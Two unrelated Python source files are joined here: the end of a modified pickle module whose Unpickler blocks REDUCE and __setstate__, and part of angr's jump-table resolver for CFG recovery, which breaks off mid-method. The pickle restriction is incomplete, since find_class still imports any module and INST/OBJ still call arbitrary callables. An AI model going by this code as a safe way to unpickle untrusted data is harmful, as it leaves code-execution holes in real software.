self.append(())
dispatch[EMPTY_TUPLE[0]] = load_empty_tuple
def load_tuple1(self):
self.stack[-1] = (self.stack[-1],)
dispatch[TUPLE1[0]] = load_tuple1
def load_tuple2(self):
self.stack[-2:] = [(self.stack[-2], self.stack[-1])]
dispatch[TUPLE2[0]] = load_tuple2
def load_tuple3(self):
self.stack[-3:] = [(self.stack[-3], self.stack[-2], self.stack[-1])]
dispatch[TUPLE3[0]] = load_tuple3
def load_empty_list(self):
self.append([])
dispatch[EMPTY_LIST[0]] = load_empty_list
def load_empty_dictionary(self):
self.append({})
dispatch[EMPTY_DICT[0]] = load_empty_dictionary
def load_empty_set(self):
self.append(set())
dispatch[EMPTY_SET[0]] = load_empty_set
def load_frozenset(self):
items = self.pop_mark()
self.append(frozenset(items))
dispatch[FROZENSET[0]] = load_frozenset
def load_list(self):
items = self.pop_mark()
self.append(items)
dispatch[LIST[0]] = load_list
def load_dict(self):
items = self.pop_mark()
d = {items[i]: items[i + 1]
for i in range(0, len(items), 2)}
self.append(d)
dispatch[DICT[0]] = load_dict
# INST and OBJ differ only in how they get a class object. It's not
# only sensible to do the rest in a shared routine; when the two routines
# were separate, they diverged and grew different bugs.
# klass is the class to instantiate, and k points to the topmost mark
# object, following which are the arguments for klass.__init__.
def _instantiate(self, klass, args):
if (args or not isinstance(klass, type) or
hasattr(klass, "__getinitargs__")):
try:
value = klass(*args)
except TypeError as err:
raise TypeError("in constructor for %s: %s" %
(klass.__name__, str(err)), sys.exc_info()[2])
else:
value = klass.__new__(klass)
self.append(value)
def load_inst(self):
module = self.readline()[:-1].decode("ascii")
name = self.readline()[:-1].decode("ascii")
klass = self.find_class(module, name)
self._instantiate(klass, self.pop_mark())
dispatch[INST[0]] = load_inst
def load_obj(self):
# Stack is ... markobject classobject arg1 arg2 ...
args = self.pop_mark()
cls = args.pop(0)
self._instantiate(cls, args)
dispatch[OBJ[0]] = load_obj
def load_newobj(self):
args = self.stack.pop()
cls = self.stack.pop()
obj = cls.__new__(cls, *args)
self.append(obj)
dispatch[NEWOBJ[0]] = load_newobj
def load_newobj_ex(self):
kwargs = self.stack.pop()
args = self.stack.pop()
cls = self.stack.pop()
obj = cls.__new__(cls, *args, **kwargs)
self.append(obj)
dispatch[NEWOBJ_EX[0]] = load_newobj_ex
def load_global(self):
module = self.readline()[:-1].decode("utf-8")
name = self.readline()[:-1].decode("utf-8")
klass = self.find_class(module, name)
self.append(klass)
dispatch[GLOBAL[0]] = load_global
def load_stack_global(self):
name = self.stack.pop()
module = self.stack.pop()
if type(name) is not str or type(module) is not str:
raise UnpicklingError("STACK_GLOBAL requires str")
self.append(self.find_class(module, name))
dispatch[STACK_GLOBAL[0]] = load_stack_global
def load_ext1(self):
code = self.read(1)[0]
self.get_extension(code)
dispatch[EXT1[0]] = load_ext1
def load_ext2(self):
code, = unpack('<H', self.read(2))
self.get_extension(code)
dispatch[EXT2[0]] = load_ext2
def load_ext4(self):
code, = unpack('<i', self.read(4))
self.get_extension(code)
dispatch[EXT4[0]] = load_ext4
def get_extension(self, code):
nil = []
obj = _extension_cache.get(code, nil)
if obj is not nil:
self.append(obj)
return
key = _inverted_registry.get(code)
if not key:
if code <= 0: # note that 0 is forbidden
# Corrupt or hostile pickle.
raise UnpicklingError("EXT specifies code <= 0")
raise ValueError("unregistered extension code %d" % code)
obj = self.find_class(*key)
_extension_cache[code] = obj
self.append(obj)
def find_class(self, module, name):
# Subclasses may override this.
if self.proto < 3 and self.fix_imports:
if (module, name) in _compat_pickle.NAME_MAPPING:
module, name = _compat_pickle.NAME_MAPPING[(module, name)]
elif module in _compat_pickle.IMPORT_MAPPING:
module = _compat_pickle.IMPORT_MAPPING[module]
__import__(module, level=0)
if self.proto >= 4:
return _getattribute(sys.modules[module], name)[0]
else:
return getattr(sys.modules[module], name)
def load_reduce(self):
raise ValueError('overriding reduce is forbidden for security reasons')
# stack = self.stack
# args = stack.pop()
# func = stack[-1]
# stack[-1] = func(*args)
dispatch[REDUCE[0]] = load_reduce
def load_pop(self):
if self.stack:
del self.stack[-1]
else:
self.pop_mark()
dispatch[POP[0]] = load_pop
def load_pop_mark(self):
self.pop_mark()
dispatch[POP_MARK[0]] = load_pop_mark
def load_dup(self):
self.append(self.stack[-1])
dispatch[DUP[0]] = load_dup
def load_get(self):
i = int(self.readline()[:-1])
self.append(self.memo[i])
dispatch[GET[0]] = load_get
def load_binget(self):
i = self.read(1)[0]
self.append(self.memo[i])
dispatch[BINGET[0]] = load_binget
def load_long_binget(self):
i, = unpack('<I', self.read(4))
self.append(self.memo[i])
dispatch[LONG_BINGET[0]] = load_long_binget
def load_put(self):
i = int(self.readline()[:-1])
if i < 0:
raise ValueError("negative PUT argument")
self.memo[i] = self.stack[-1]
dispatch[PUT[0]] = load_put
def load_binput(self):
i = self.read(1)[0]
if i < 0:
raise ValueError("negative BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[BINPUT[0]] = load_binput
def load_long_binput(self):
i, = unpack('<I', self.read(4))
if i > maxsize:
raise ValueError("negative LONG_BINPUT argument")
self.memo[i] = self.stack[-1]
dispatch[LONG_BINPUT[0]] = load_long_binput
def load_memoize(self):
memo = self.memo
memo[len(memo)] = self.stack[-1]
dispatch[MEMOIZE[0]] = load_memoize
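# Note that MEMOIZE (protocol 4) always stores at the next free memo index, so
# the writer never needs to emit an explicit PUT/BINPUT index for it.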
def load_append(self):
stack = self.stack
value = stack.pop()
list = stack[-1]
list.append(value)
dispatch[APPEND[0]] = load_append
def load_appends(self):
items = self.pop_mark()
list_obj = self.stack[-1]
try:
extend = list_obj.extend
except AttributeError:
pass
else:
extend(items)
return
# Even though PEP 307 requires extend() and append() methods, fall back
# on append() if the object has no extend() method, for backward
# compatibility.
append = list_obj.append
for item in items:
append(item)
dispatch[APPENDS[0]] = load_appends
def load_setitem(self):
stack = self.stack
value = stack.pop()
key = stack.pop()
dict = stack[-1]
dict[key] = value
dispatch[SETITEM[0]] = load_setitem
def load_setitems(self):
items = self.pop_mark()
dict = self.stack[-1]
for i in range(0, len(items), 2):
dict[items[i]] = items[i + 1]
dispatch[SETITEMS[0]] = load_setitems
def load_additems(self):
items = self.pop_mark()
set_obj = self.stack[-1]
if isinstance(set_obj, set):
set_obj.update(items)
else:
add = set_obj.add
for item in items:
add(item)
dispatch[ADDITEMS[0]] = load_additems
def load_build(self):
stack = self.stack
state = stack.pop()
inst = stack[-1]
setstate = getattr(inst, "__setstate__", None)
if setstate is not None:
raise ValueError('overriding setstate is forbidden for security reasons')
# setstate(state)
# return
slotstate = None
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if state:
inst_dict = inst.__dict__
intern = sys.intern
for k, v in state.items():
if type(k) is str:
inst_dict[intern(k)] = v
else:
inst_dict[k] = v
if slotstate:
for k, v in slotstate.items():
setattr(inst, k, v)
dispatch[BUILD[0]] = load_build
def load_mark(self):
self.metastack.append(self.stack)
self.stack = []
self.append = self.stack.append
dispatch[MARK[0]] = load_mark
def load_stop(self):
value = self.stack.pop()
raise _Stop(value)
dispatch[STOP[0]] = load_stop
# Shorthands
def _dump(obj, file, protocol=None, *, fix_imports=True):
_Pickler(file, protocol, fix_imports=fix_imports).dump(obj)
def _dumps(obj, protocol=None, *, fix_imports=True):
f = io.BytesIO()
_Pickler(f, protocol, fix_imports=fix_imports).dump(obj)
res = f.getvalue()
assert isinstance(res, bytes_types)
return res
def _load(file, *, fix_imports=True, encoding="ASCII", errors="strict"):
return _Unpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
def _loads(s, *, fix_imports=True, encoding="ASCII", errors="strict"):
if isinstance(s, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(s)
return _Unpickler(file, fix_imports=fix_imports,
encoding=encoding, errors=errors).load()
Pickler, Unpickler = _Pickler, _Unpickler
dump, dumps, load, loads = _dump, _dumps, _load, _loads
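# A small usage sketch (values are illustrative): plain builtin containers
# round-trip through this module, while REDUCE and custom __setstate__ are
# rejected by the restricted Unpickler above.
# >>> payload = {"answer": 42, "items": [1, 2, 3], "name": "demo"}
# >>> blob = dumps(payload, protocol=2)
# >>> loads(blob) == payload
# True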
# Doctest
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='display contents of the pickle files')
parser.add_argument(
'pickle_file', type=argparse.FileType('br'),
nargs='*', help='the pickle file')
parser.add_argument(
'-t', '--test', action='store_true',
help='run self-test suite')
parser.add_argument(
'-v', action='store_true',
help='run verbosely; only affects self-test run')
args = parser.parse_args()
if args.test:
_test()
else:
if not args.pickle_file:
parser.print_help()
else:
import pprint
for f in args.pickle_file:
obj = load(f)
pprint.pprint(obj)
|
py | 7dfaa272a59507854349da9175fbcbe930618d9d | from typing import Tuple, Optional, Dict
import logging
from collections import defaultdict, OrderedDict
import pyvex
import claripy
from archinfo.arch_arm import is_arm_arch
from ....concretization_strategies import SimConcretizationStrategyAny
from ....knowledge_plugins.cfg import IndirectJump, IndirectJumpType
from ....engines.vex.claripy import ccall
from ....engines.light import SimEngineLightVEXMixin, SimEngineLight, SpOffset, RegisterOffset
from ....errors import AngrError, SimError
from ....blade import Blade
from ....annocfg import AnnotatedCFG
from .... import sim_options as o
from .... import BP, BP_BEFORE, BP_AFTER
from ....exploration_techniques.slicecutor import Slicecutor
from ....exploration_techniques.explorer import Explorer
from ....utils.constants import DEFAULT_STATEMENT
from .resolver import IndirectJumpResolver
from ....misc.ux import once
try:
from ....engines import pcode
except ImportError:
pcode = None
l = logging.getLogger(name=__name__)
class NotAJumpTableNotification(AngrError):
pass
class UninitReadMeta:
uninit_read_base = 0xc000000
class AddressTransferringTypes:
Assignment = 0
SignedExtension = 1
UnsignedExtension = 2
Truncation = 3
Or1 = 4
ShiftLeft = 5
class JumpTargetBaseAddr:
def __init__(self, stmt_loc, stmt, tmp, base_addr=None, tmp_1=None):
self.stmt_loc = stmt_loc
self.stmt = stmt
self.tmp = tmp # type:int
self.tmp_1 = tmp_1
self.base_addr = base_addr # type:int
assert base_addr is not None or tmp_1 is not None
@property
def base_addr_available(self):
return self.base_addr is not None
#
# Jump table pre-check
#
_x86_ct = ccall.data['X86']['CondTypes']
_amd64_ct = ccall.data['AMD64']['CondTypes']
EXPECTED_COND_TYPES = {
'X86': {
_x86_ct['CondB'],
_x86_ct['CondNB'],
_x86_ct['CondBE'],
_x86_ct['CondNBE'],
_x86_ct['CondL'],
_x86_ct['CondNL'],
_x86_ct['CondLE'],
_x86_ct['CondNLE'],
},
'AMD64': {
_amd64_ct['CondB'],
_amd64_ct['CondNB'],
_amd64_ct['CondBE'],
_amd64_ct['CondNBE'],
_amd64_ct['CondL'],
_amd64_ct['CondNL'],
_amd64_ct['CondLE'],
_amd64_ct['CondNLE'],
},
'ARM': {
ccall.ARMCondHS,
ccall.ARMCondLO,
ccall.ARMCondHI,
ccall.ARMCondLS,
ccall.ARMCondGE,
ccall.ARMCondLT,
ccall.ARMCondGT,
ccall.ARMCondLE,
},
'AARCH64': {
ccall.ARM64CondCS,
ccall.ARM64CondCC,
ccall.ARM64CondHI,
ccall.ARM64CondLS,
ccall.ARM64CondGE,
ccall.ARM64CondLT,
ccall.ARM64CondGT,
ccall.ARM64CondLE,
},
}
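# These are the bounded-comparison condition codes (above/below, less/greater,
# and their "or equal" forms) that typically guard a jump table's bounds check;
# _handle_CCall below only treats a ccall using one of these conditions as the
# table-index comparison.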
class JumpTableProcessorState:
"""
The state used in JumpTableProcessor.
"""
__slots__ = ('arch', '_registers', '_stack', '_tmpvar_source', 'is_jumptable', 'stmts_to_instrument',
'regs_to_initialize', )
def __init__(self, arch):
self.arch = arch
self._registers = {}
self._stack = {}
self._tmpvar_source = {} # a mapping from temporary variables to their origins
self.is_jumptable = None # is the current slice representing a jump table?
self.stmts_to_instrument = [ ] # Store/Put statements that we should instrument
self.regs_to_initialize = [ ] # registers that we should initialize
class RegOffsetAnnotation(claripy.Annotation):
__slots__ = ('reg_offset', )
def __init__(self, reg_offset: RegisterOffset):
self.reg_offset = reg_offset
@property
def relocatable(self):
return False
@property
def eliminatable(self):
return False
class JumpTableProcessor(
SimEngineLightVEXMixin,
SimEngineLight,
): # pylint:disable=abstract-method
"""
Implements a simple and stupid data dependency tracking for stack and register variables.
Also determines which statements to instrument during static execution of the slice later. For example, the
following example is not uncommon in non-optimized binaries::
mov [rbp+var_54], 1
loc_4051a6:
cmp [rbp+var_54], 6
ja loc_405412 (default)
loc_4051b0:
mov eax, [rbp+var_54]
mov rax, qword [rax*8+0x223a01]
jmp rax
We want to instrument the first instruction and replace the constant 1 with a symbolic variable, otherwise we will
not be able to recover all jump targets later in block 0x4051b0.
"""
def __init__(self, project, bp_sp_diff=0x100):
super().__init__()
self.project = project
self._bp_sp_diff = bp_sp_diff # bp - sp
self._tsrc = set() # a scratch variable to store source information for values
self._SPOFFSET_BASE = claripy.BVS('SpOffset', self.project.arch.bits, explicit_name=True)
self._REGOFFSET_BASE: Dict[int,claripy.ast.BV] = {}
@staticmethod
def _top(size: int):
return None
@staticmethod
def _is_top(expr) -> bool:
return expr is None
@staticmethod
def _is_spoffset(expr) -> bool:
return 'SpOffset' in expr.variables
def _get_spoffset_expr(self, sp_offset: SpOffset) -> claripy.ast.BV:
v = self._SPOFFSET_BASE.annotate(RegOffsetAnnotation(sp_offset))
return v
@staticmethod
def _extract_spoffset_from_expr(expr: claripy.ast.Base) -> Optional[SpOffset]:
if expr.op == "BVS":
for anno in expr.annotations:
if isinstance(anno, RegOffsetAnnotation):
return anno.reg_offset
elif expr.op == "__add__":
if len(expr.args) == 1:
return JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
elif len(expr.args) == 2 and expr.args[1].op == "BVV":
sp_offset = JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
if sp_offset is not None:
delta = expr.args[1]._model_concrete.value
sp_offset += delta
return sp_offset
elif expr.op == "__and__":
if len(expr.args) == 2 and expr.args[1].op == "BVV":
# ignore all masking on SpOffsets
return JumpTableProcessor._extract_spoffset_from_expr(expr.args[0])
return None
@staticmethod
def _is_registeroffset(expr) -> bool:
return 'RegisterOffset' in expr.variables
def _get_regoffset_expr(self, reg_offset: RegisterOffset, bits: int) -> claripy.ast.BV:
if bits not in self._REGOFFSET_BASE:
self._REGOFFSET_BASE[bits] = claripy.BVS('RegisterOffset', bits, explicit_name=True)
v = self._REGOFFSET_BASE[bits].annotate(RegOffsetAnnotation(reg_offset))
return v
@staticmethod
def _extract_regoffset_from_expr(expr: claripy.ast.Base) -> Optional[RegisterOffset]:
if expr.op == "BVS":
for anno in expr.annotations:
if isinstance(anno, RegOffsetAnnotation):
return anno.reg_offset
elif expr.op == "__add__":
if len(expr.args) == 1:
return JumpTableProcessor._extract_regoffset_from_expr(expr.args[0])
elif len(expr.args) == 2 and expr.args[1].op == "BVV":
reg_offset = JumpTableProcessor._extract_regoffset_from_expr(expr.args[0])
if reg_offset is not None:
delta = expr.args[1]._model_concrete.value
reg_offset += delta
return reg_offset
elif expr.op == "__and__":
if len(expr.args) == 2 and expr.args[1].op == "BVV":
# ignore all masking on RegisterOffsets
return JumpTableProcessor._extract_regoffset_from_expr(expr.args[0])
return None
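# Informally: for an AST like RegisterOffset_BVS + 0x10, where the BVS carries
# a RegOffsetAnnotation for, say, r2, the helper above is expected to fold the
# constant in and return that register offset shifted by 0x10, while a trailing
# bitwise mask is simply looked through. The concrete register is illustrative.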
def _handle_WrTmp(self, stmt):
self._tsrc = set()
super()._handle_WrTmp(stmt)
if self._tsrc:
self.state._tmpvar_source[stmt.tmp] = self._tsrc
def _handle_Put(self, stmt):
self._tsrc = set()
offset = stmt.offset
data = self._expr(stmt.data)
if self._tsrc:
r = [self._tsrc, data]
else:
r = [(self.block.addr, self.stmt_idx), data]
self.state._registers[offset] = r
def _handle_Store(self, stmt):
self._tsrc = set()
addr = self._expr(stmt.addr)
data = self._expr(stmt.data)
if addr is None:
return
if isinstance(addr, SpOffset):
self.state._stack[addr.offset] = ((self.block.addr, self.stmt_idx), data)
def _handle_RdTmp(self, expr):
v = super()._handle_RdTmp(expr)
if expr.tmp in self.state._tmpvar_source:
self._tsrc |= set(self.state._tmpvar_source[expr.tmp])
return v
def _handle_Get(self, expr):
if expr.offset == self.arch.bp_offset:
v = self._get_spoffset_expr(SpOffset(self.arch.bits, self._bp_sp_diff))
elif expr.offset == self.arch.sp_offset:
v = self._get_spoffset_expr(SpOffset(self.arch.bits, 0))
else:
if expr.offset in self.state._registers:
self._tsrc |= set(self.state._registers[expr.offset][0])
v = self.state._registers[expr.offset][1]
else:
# the register does not exist
# we initialize it here
v = RegisterOffset(expr.result_size(self.tyenv), expr.offset, 0)
v = self._get_regoffset_expr(v, expr.result_size(self.tyenv))
src = (self.block.addr, self.stmt_idx)
self._tsrc.add(src)
self.state._registers[expr.offset] = ([src], v)
# make sure the size matches
# note that this is sometimes incorrect. for example, we do not differentiate between reads at ah and al...
# but it should be good enough for now (without switching state._registers to a real SimMemory, which will
# surely slow down stuff quite a bit)
if v is not None:
bits = expr.result_size(self.tyenv)
if v.size() > bits:
v = v[bits - 1:0]
elif v.size() < bits:
v = claripy.ZeroExt(bits - v.size(), v)
return v
def _handle_function(self, expr): # pylint:disable=unused-argument,no-self-use
return None # This analysis is not interprocedural
def _handle_Load(self, expr):
addr = self._expr(expr.addr)
size = expr.result_size(self.tyenv) // 8
return self._do_load(addr, size)
def _handle_LoadG(self, stmt):
guard = self._expr(stmt.guard)
if guard is True:
return self._do_load(stmt.addr, stmt.addr.result_size(self.tyenv) // 8)
elif guard is False:
return self._do_load(stmt.alt, stmt.alt.result_size(self.tyenv) // 8)
else:
return None
def _handle_Const(self, expr):
v = super()._handle_Const(expr)
self._tsrc.add('const')
return v
def _handle_CmpLE(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpGE(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpLT(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CmpGT(self, expr):
self._handle_Comparison(*expr.args)
def _handle_CCall(self, expr):
if not isinstance(expr.args[0], pyvex.IRExpr.Const):
return
cond_type_enum = expr.args[0].con.value
if self.arch.name in { 'X86', 'AMD64', 'AARCH64' }:
if cond_type_enum in EXPECTED_COND_TYPES[self.arch.name]:
self._handle_Comparison(expr.args[2], expr.args[3])
elif is_arm_arch(self.arch):
if cond_type_enum in EXPECTED_COND_TYPES['ARM']:
self._handle_Comparison(expr.args[2], expr.args[3])
else:
raise ValueError("Unexpected ccall encountered in architecture %s." % self.arch.name)
def _handle_Comparison(self, arg0, arg1):
# found the comparison
arg0_src, arg1_src = None, None
if isinstance(arg0, pyvex.IRExpr.RdTmp):
if arg0.tmp in self.state._tmpvar_source:
arg0_src = self.state._tmpvar_source[arg0.tmp]
if not arg0_src or len(arg0_src) > 1:
arg0_src = None
else:
arg0_src = next(iter(arg0_src))
elif isinstance(arg0, pyvex.IRExpr.Const):
arg0_src = 'const'
if isinstance(arg1, pyvex.IRExpr.RdTmp):
if arg1.tmp in self.state._tmpvar_source:
arg1_src = self.state._tmpvar_source[arg1.tmp]
if not arg1_src or len(arg1_src) > 1:
arg1_src = None
else:
arg1_src = next(iter(arg1_src))
elif isinstance(arg1, pyvex.IRExpr.Const):
arg1_src = 'const'
if arg0_src == 'const' and arg1_src == 'const':
# comparison of two consts... there is nothing we can do
self.state.is_jumptable = True
return
if arg0_src not in ('const', None) and arg1_src not in ('const', None):
# this is probably not a jump table
return
if arg1_src == 'const':
# make sure arg0_src is const
arg0_src, arg1_src = arg1_src, arg0_src
self.state.is_jumptable = True
if arg0_src != 'const':
# we failed during dependency tracking so arg0_src couldn't be determined
# but we will still try to resolve it as a jump table as a fallback
return
if isinstance(arg1_src, tuple):
arg1_src_stmt = self.project.factory.block(arg1_src[0], cross_insn_opt=True).vex.statements[arg1_src[1]]
if isinstance(arg1_src_stmt, pyvex.IRStmt.Store):
# Storing a constant/variable in memory
# We will need to overwrite it when executing the slice to guarantee the full recovery of jump table
# targets.
#
# Here is an example:
# mov [rbp+var_54], 1
# loc_4051a6:
# cmp [rbp+var_54], 6
# ja loc_405412 (default)
#
# Instead of writing 1 to [rbp+var_54], we want to write a symbolic variable there instead. Otherwise
# we will only recover the second jump target instead of all 7 targets.
self.state.stmts_to_instrument.append(('mem_write', ) + arg1_src)
elif isinstance(arg1_src_stmt, pyvex.IRStmt.WrTmp) \
and isinstance(arg1_src_stmt.data, pyvex.IRExpr.Load):
# Loading a constant/variable from memory (and later the value is stored in a register)
# Same as above, we will need to overwrite it when executing the slice to guarantee the full recovery
# of jump table targets.
#
# Here is an example:
# mov eax, [0x625a3c]
# cmp eax, 0x4
# ja 0x40899d (default)
# loc_408899:
# mov eax, eax
# mov rax, qword [rax*8+0x220741]
# jmp rax
#
self.state.stmts_to_instrument.append(('mem_read', ) + arg1_src)
elif isinstance(arg1_src_stmt, pyvex.IRStmt.Put):
# Storing a constant/variable in register
# Same as above...
#
# Here is an example:
# movzx eax, byte ptr [rax+12h]
# movzx eax, al
# cmp eax, 0xe
# ja 0x405b9f (default)
# loc_405b34:
# mov eax, eax
# mov rax, qword [rax*8+0x2231ae]
#
self.state.stmts_to_instrument.append(('reg_write', ) + arg1_src)
def _do_load(self, addr, size):
src = (self.block.addr, self.stmt_idx)
self._tsrc = { src }
if addr is None:
return None
if self._is_spoffset(addr):
spoffset = self._extract_spoffset_from_expr(addr)
if spoffset is not None and spoffset.offset in self.state._stack:
self._tsrc = { self.state._stack[spoffset.offset][0] }
return self.state._stack[spoffset.offset][1]
elif isinstance(addr, int):
# Load data from memory if it is mapped
try:
v = self.project.loader.memory.unpack_word(addr, size=size)
return v
except KeyError:
return None
elif self._is_registeroffset(addr):
# Load data from a register, but this register hasn't been initialized at this point
# We will need to initialize this register during slice execution later
# Try to get where this register is first accessed
reg_offset = self._extract_regoffset_from_expr(addr)
if reg_offset is not None and reg_offset.reg in self.state._registers:
try:
source = next(iter(src for src in self.state._registers[reg_offset.reg][0] if src != 'const'))
assert isinstance(source, tuple)
self.state.regs_to_initialize.append(source + (reg_offset.reg, reg_offset.bits))
except StopIteration:
# we don't need to initialize this register
# it might be caused by an incorrect analysis result
# e.g. PN-337140.bin 11e918 r0 comes from r4, r4 comes from r0@11e8c0, and r0@11e8c0 comes from
# function call sub_375c04. Since we do not analyze sub_375c04, we treat r0@11e918 as a constant 0.
pass
return None
return None
#
# State hooks
#
class StoreHook:
@staticmethod
def hook(state):
write_length = state.inspect.mem_write_length
if write_length is None:
write_length = len(state.inspect.mem_write_expr)
else:
write_length = write_length * state.arch.byte_width
state.inspect.mem_write_expr = state.solver.BVS('instrumented_store', write_length)
class LoadHook:
def __init__(self):
self._var = None
def hook_before(self, state):
addr = state.inspect.mem_read_address
size = state.solver.eval(state.inspect.mem_read_length)
self._var = state.solver.BVS('instrumented_load', size * 8)
state.memory.store(addr, self._var, endness=state.arch.memory_endness)
def hook_after(self, state):
state.inspect.mem_read_expr = self._var
class PutHook:
@staticmethod
def hook(state):
state.inspect.reg_write_expr = state.solver.BVS('instrumented_put',
state.solver.eval(state.inspect.reg_write_length) * 8)
class RegisterInitializerHook:
def __init__(self, reg_offset, reg_bits, value):
self.reg_offset = reg_offset
self.reg_bits = reg_bits
self.value = value
def hook(self, state):
state.registers.store(self.reg_offset, state.solver.BVV(self.value, self.reg_bits))
class BSSHook:
def __init__(self, project, bss_regions):
self.project = project
self._bss_regions = bss_regions
self._written_addrs = set()
def bss_memory_read_hook(self, state):
if not self._bss_regions:
return
read_addr = state.inspect.mem_read_address
read_length = state.inspect.mem_read_length
if not isinstance(read_addr, int) and read_addr.symbolic:
# don't touch it
return
concrete_read_addr = state.solver.eval(read_addr)
concrete_read_length = state.solver.eval(read_length)
for start, size in self._bss_regions:
if start <= concrete_read_addr < start + size:
# this is a read from the .bss section
break
else:
return
if concrete_read_addr not in self._written_addrs:
# it was never written to before. we overwrite it with unconstrained bytes
for i in range(0, concrete_read_length, self.project.arch.bytes):
state.memory.store(concrete_read_addr + i, state.solver.Unconstrained('unconstrained',
self.project.arch.bits),
endness=self.project.arch.memory_endness)
# job done :-)
def bss_memory_write_hook(self, state):
if not self._bss_regions:
return
write_addr = state.inspect.mem_write_address
if not isinstance(write_addr, int) and write_addr.symbolic:
return
concrete_write_addr = state.solver.eval(write_addr)
concrete_write_length = state.solver.eval(state.inspect.mem_write_length) \
if state.inspect.mem_write_length is not None \
else len(state.inspect.mem_write_expr) // state.arch.byte_width
for start, size in self._bss_regions:
if start <= concrete_write_addr < start + size:
# hit a BSS section
break
else:
return
if concrete_write_length > 1024:
l.warning("Writing more 1024 bytes to the BSS region, only considering the first 1024 bytes.")
concrete_write_length = 1024
for i in range(concrete_write_addr, concrete_write_addr + concrete_write_length):
self._written_addrs.add(i)
#
# Main class
#
class JumpTableResolver(IndirectJumpResolver):
"""
A generic jump table resolver.
This is a fast jump table resolution pass. For performance reasons, it makes the following assumptions:
- The final jump target comes from the memory.
- The final jump target must be directly read out of the memory, without any further modification or altering.
"""
def __init__(self, project):
super(JumpTableResolver, self).__init__(project, timeless=False)
self._bss_regions = None
# the maximum number of resolved targets. Will be initialized from CFG.
self._max_targets = None
# cached memory read addresses that are used to initialize uninitialized registers
# should be cleared before every symbolic execution run on the slice
self._cached_memread_addrs = { }
self._find_bss_region()
def filter(self, cfg, addr, func_addr, block, jumpkind):
if pcode is not None and isinstance(block.vex, pcode.lifter.IRSB):
if once('pcode__indirect_jump_resolver'):
l.warning('JumpTableResolver does not support P-Code IR yet; CFG may be incomplete.')
return False
if is_arm_arch(self.project.arch):
# For ARM, we support both jump tables and "call tables" (because of how crazy ARM compilers are...)
if jumpkind in ('Ijk_Boring', 'Ijk_Call'):
return True
else:
# For all other architectures, we only expect jump tables
if jumpkind == 'Ijk_Boring':
return True
return False
def resolve(self, cfg, addr, func_addr, block, jumpkind):
"""
Resolves jump tables.
:param cfg: A CFG instance.
:param int addr: IRSB address.
:param int func_addr: The function address.
:param pyvex.IRSB block: The IRSB.
:return: A bool indicating whether the indirect jump is resolved successfully, and a list of resolved targets
:rtype: tuple
"""
self._max_targets = cfg._indirect_jump_target_limit
for slice_steps in range(1, 4):
# Perform a backward slicing from the jump target
# Important: Do not go across function call boundaries
b = Blade(cfg.graph, addr, -1,
cfg=cfg, project=self.project,
ignore_sp=False, ignore_bp=False,
max_level=slice_steps, base_state=self.base_state, stop_at_calls=True, cross_insn_opt=True)
l.debug("Try resolving %#x with a %d-level backward slice...", addr, slice_steps)
r, targets = self._resolve(cfg, addr, func_addr, b)
if r:
return r, targets
return False, None
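# Typical call site (a hedged sketch; the binary path is illustrative): CFGFast
# ships this resolver in its default list of indirect-jump resolvers, so code
# along the lines of
#     proj = angr.Project("./a.out", auto_load_libs=False)
#     cfg = proj.analyses.CFGFast(resolve_indirect_jumps=True)
# ends up calling filter() and then resolve() for each unresolved indirect
# jump site it encounters.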
#
# Private methods
#
def _resolve(self, cfg, addr, func_addr, b):
"""
Internal method for resolving jump tables.
:param cfg: A CFG instance.
:param int addr: Address of the block where the indirect jump is.
:param int func_addr: Address of the function.
:param Blade b: The generated backward slice.
:return: A bool indicating whether the indirect jump is resolved successfully, and a list of
resolved targets.
:rtype: tuple
"""
project = self.project # short-hand
stmt_loc = (addr, DEFAULT_STATEMENT)
if stmt_loc not in b.slice:
return False, None
load_stmt_loc, load_stmt, load_size, stmts_to_remove, stmts_adding_base_addr, all_addr_holders = \
self._find_load_statement(b, stmt_loc)
ite_stmt, ite_stmt_loc = None, None
if load_stmt_loc is None:
# the load statement is not found
# maybe it's a typical ARM-style jump table like the following:
# SUB R3, R5, #34
# CMP R3, #28
# ADDLS PC, PC, R3,LSL#2
if is_arm_arch(self.project.arch):
ite_stmt, ite_stmt_loc, stmts_to_remove = self._find_load_pc_ite_statement(b, stmt_loc)
if ite_stmt is None:
return False, None
try:
jump_target = self._try_resolve_single_constant_loads(load_stmt, cfg, addr)
except NotAJumpTableNotification:
return False, None
if jump_target is not None:
if self._is_target_valid(cfg, jump_target):
ij = cfg.indirect_jumps[addr]
ij.jumptable = False
ij.resolved_targets = { jump_target }
return True, [ jump_target ]
else:
return False, None
# Well, we have a real jump table to resolve!
# skip all statements after the load statement
# We want to leave the final loaded value as symbolic, so we can
# get the full range of possibilities
b.slice.remove_nodes_from(stmts_to_remove)
try:
stmts_to_instrument, regs_to_initialize = self._jumptable_precheck(b)
except NotAJumpTableNotification:
l.debug("Indirect jump at %#x does not look like a jump table. Skip.", addr)
return False, None
# Debugging output
if l.level == logging.DEBUG:
self._dbg_repr_slice(b)
# Get all sources
sources = [ n_ for n_ in b.slice.nodes() if b.slice.in_degree(n_) == 0 ]
# Create the annotated CFG
annotatedcfg = AnnotatedCFG(project, None, detect_loops=False)
annotatedcfg.from_digraph(b.slice)
# pylint: disable=too-many-nested-blocks
for src_irsb, _ in sources:
# Use slicecutor to execute each one, and get the address
# We simply give up if any exception occurs on the way
start_state = self._initial_state(src_irsb)
# Keep IP symbolic to avoid unnecessary concretization
start_state.options.add(o.KEEP_IP_SYMBOLIC)
start_state.options.add(o.NO_IP_CONCRETIZATION)
# be quiet!!!!!!
start_state.options.add(o.SYMBOL_FILL_UNCONSTRAINED_REGISTERS)
start_state.options.add(o.SYMBOL_FILL_UNCONSTRAINED_MEMORY)
# any read from an uninitialized segment should be unconstrained
if self._bss_regions:
bss_hook = BSSHook(self.project, self._bss_regions)
bss_memory_write_bp = BP(when=BP_AFTER, enabled=True, action=bss_hook.bss_memory_write_hook)
start_state.inspect.add_breakpoint('mem_write', bss_memory_write_bp)
